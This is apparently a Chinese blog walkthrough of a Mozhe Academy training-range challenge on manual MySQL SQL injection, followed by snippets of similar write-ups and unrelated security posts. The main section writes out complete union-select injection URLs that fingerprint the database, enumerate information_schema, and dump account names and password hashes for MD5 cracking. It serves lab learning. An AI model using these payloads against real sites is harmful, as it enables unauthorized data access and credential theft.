代码编织梦想

  1.  首先进入靶场给的网址,发现是一个用户登录界面,这里就需要进行sql注入测试并MySQL数据库的信息收集

(1) 判定有没有sql注入可能。查看网页源代码

(2)发现存在变量id,那么进行测试:

        http://124.70.22.208:47350/new_list.php?id=1 and 1=1        正常页面

        http://124.70.22.208:47350/new_list.php?id=1 and 1=2(随便输也行)网页报错

        可能存在sql注入漏洞

         

(3) 进行信息收集

  •  group by 1/2/3/...        查看表的列数,5 报错,说明表中有4列
http://124.70.22.208:47350/new_list.php?id=-1 union select 1,2,3,4

  •  2,3列显示数据。接下来进行信息收集

        数据库版本:version() 

        数据库名字:database() 

        数据库用户:user()

        操作系统:@@version_compile_os

     

http://124.70.22.208:47350/new_list.php?id=-1 union select 1,version(),database(),4

        

http://124.70.22.208:47350/new_list.php?id=-1 union select 1,user(),@@version_compile_os,4

  •  查询mozhe网站对应数据库下的表名

    • information_schema.tables #information_schema(MySQL5.0以上版本才会有的数据库名)下面的所有表名

      information_schema.columns #information_schema下面所有的列名

      table_name                 #表名

      column_name             #列名

      table_schema             #数据库名

               group_concat(列名)   #打印表下所有列名

http://124.70.22.208:47350/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

​

  • 查询账号表下的列名

http://124.70.22.208:47350/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

2.进行sql注入

  • 查询表中对应的登陆账号和密码

http://124.70.22.208:47350/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member 

  • 这里要注意,还差最后一步,因为第一次查询的账号密码进行MD5解密后显示被禁止登陆,那么就需要查询其他的账号密码

http://124.70.22.208:47350/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1

  • 进行MD5解密后即可登录进入管理系统

完成!

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71487689/article/details/127825824

墨者学院之SQL手工注入漏洞测试(MySQL数据库)-爱代码爱编程

Do what you said,say what you can do 做你说过的,说你能做的 关于手工注入,网上已经有很多教程,本文讲解的是使用SQLmap工具来对该关卡进行注入,最后找到key。   首先打开靶场环境,可以看到用户登录的场景,里面包含账号和密码两个输入框。对账号密码输入框进行注入测试,但都不成功,此时发现在登录按钮下面有一条维

墨者mysql注入_墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)-爱代码爱编程

登录平台靶靶场后会发现底部有个通知点进去之后会发现URL中带有?id这地方八成是可以注入的 先尝试了一下在tingjigonggao后面加'号结果发下报错了看这提示应该是sql语句错误 然后尝试了下加上‘ and ’1‘=’1 结果回显是正常的,加上‘ and 1=1 报错说明这里是一个字符型的注入,当然这个靶场的题目也已经提示了这次的

墨者学院—SQL手工注入漏洞测试(MySQL数据库)解题-爱代码爱编程

墨者学院—SQL手工注入漏洞测试(MySQL数据库)解题过程 实验目的: 实验过程: 打开后,点“点击访问” 点击上图的红色标注“关于平台停机维护的通知”,打开如下: 对于上图红色标注处,我们开始手工sql注入过程:判断注入:猜解列名数量(字段数) order by x 错误与正常的正常值 order by +(我们猜测的,此处我们猜测4

墨者靶场:SQL手工注入漏洞测试(MySQL数据库)-爱代码爱编程

有一说一,本来是准备把笔记写在墨者的解题思路里的,结果不让写了,离谱 启动靶场后,会进入一个登录界面,界面下面有一个维修公告,打开公告。 1.判断有没有注入点: 219.153.49.228:49464/new_list.php?id=1 and 1=1 219.153.49.228:49464/new_list.php?id=1 and 1=2

墨者学院—SQL手工注入漏洞测试(MySQL数据库-字符型)-爱代码爱编程

写在前面: 最近准备从头再来过一遍sql,所以开始刷墨者学院的题目。 这是一道最简单的字符型 联合注入题目 目的:拿到用户与密码 首先寻找注入点,我们发现在维护界面存在id字段可能存在注入。 1.找闭合字符 首先尝试寻找闭合字符,当输入‘时界面加载正确 可能是’,接着测试 and 1=1 界面正确,and1=2 界面错误 没错说明确实闭合字符是单引号

[墨者学院]SQL手工注入漏洞测试(MySQL数据库)-爱代码爱编程

必知知识: 数据库版本:version() 数据库名:database() 数据库用户:user() 操作系统:@@version_compile_os information_schema.tables:记录所有表名信息的表 information_schema.column:记录所有列名信息的表 table_name:表名 column_name:

墨者SQL手工注入漏洞测试(MySQL数据库)思路-爱代码爱编程

师从小迪,刚看完sql注入,印象最深刻就是小迪师傅到第四天了打火机依旧没油,咔嚓咔嚓打不着火 进入 寻找注入点 看这 http://219.153.49.228:47589/new_list.php?id=1 判断注入,老办法and 1 = 1和and 1=2 http://219.153.49.228:47589/new_list.php?id=

墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)-爱代码爱编程

1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak

墨者靶场—SQL手工注入漏洞测试(MySQL数据库)-爱代码爱编程

0x00 前言 学SQL注入也有一段时间了,找了一个在线靶场,这个题目基本上学会最基本的注入原理和方法都能拿下,废话就不多说了,直接来演示吧~菜鸟渗透,大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Nginx+PHP+MySQL 那我们现在启动、进入靶场 进入靶场后我们可以看到是一个登录界面,但可以发现登录

墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)-爱代码爱编程

0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目这里

墨者学院SQL手工注入漏洞测试(MySQL数据库)的wp-爱代码爱编程

链接: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 1.判断是否存在爆破点: http://124.70.64.48:46855/new_list.php?id=1dfddsvs 返回错误,id后的输入数据被处理,表示存在注入点 2.猜

sql注入(2) 墨者学院之SQL手工注入漏洞测试(MySQL数据库-字符型)-爱代码爱编程

目录 1.靶场环境 2.解题步骤 2.1判断注入点 2.2判断字段数 2.3信息收集 2.4爆破数据库 2.4.1爆破数据库表名  2.4.2爆破指定表的列名 2.4.3查询账号密码  3.md5解码并登录后台 1.靶场环境 在线靶场_墨者学院 2.解题步骤 2.1判断注入点 在 ?id=后面加‘判断,结果显示存在

墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符)-爱代码爱编程

启动靶场正常访问: 随便输入账号和密码: 并没有发现什么可用的信息 点击查看公告: 可以看到详细的公告哈!我们看看能不能在公告上做文章。 修改公告id后发现没有公告展示了。  开始尝试从这边注入: /new_list.php?id=tingjigonggao and 1=1 条件成立也没有数据,我们来判断一下闭合。

墨者学院SQL手工注入漏洞测试(MySQL数据库)-爱代码爱编程

打开靶机发现有个可点击的链接   测试是否存在sql注入 1 and 1=1 正常 1 and 1=2 错误 //故而存在sql注入 1.判断字段 order by语句 order by 1,2,3,4,5 判断到5时候报错,即有四个字段 2.报错看回显 ?id=-1 union select 1,2,3,4 //这里把id改成=-1就

《墨者学院——sql手工注入漏洞测试(mysql数据库)》_susususuao的博客-爱代码爱编程

作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 一:思路 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。流程 掌握SQL注入原理;了解手工注入的方法

永恒之黑漏洞复现_t1009∞的博客-爱代码爱编程

永痕之黑 1. 永恒之黑漏洞相关信息 漏洞介绍 https://nvd.nist.gov/vuln/detail/CVE-2020-0796 漏洞影响版本: Windows 10 Version 1903 for 32

从事网络安全,可以考取什么证书?_oldboyedu1的博客-爱代码爱编程

  目前,网络安全可以考取的证书有很多,其中包括CISP、CISP-PTE、CISP-A、CISSP、CISA、信息安全工程师等,本文为大家重点介绍一下CISSP、CISP和信息安全工程师,快来看看吧。   1、CISSP国际认证   CISSP,信息系统安全专业认证。这一证书代表国际信息系统安全从业人员的权威认证,CISSP认证项目面向从事商业环境安

为什么网络安全缺口很大,而招聘却很少?-爱代码爱编程

2020年我国网络空间安全人才数量缺口超过了140万,就业人数却只有10多万,缺口高达了93%。这里就有人会问了: 1、网络安全行业为什么这么缺人? 2、明明人才那么稀缺,为什么招聘时招安全的人员却没有那么多呢? 首先来回答第一个问题,从政策背景、市场需求、行业现状来说。 政策背景 自从斯诺登棱镜门事件曝光之后,网络空间站成为现代战场第一战场,网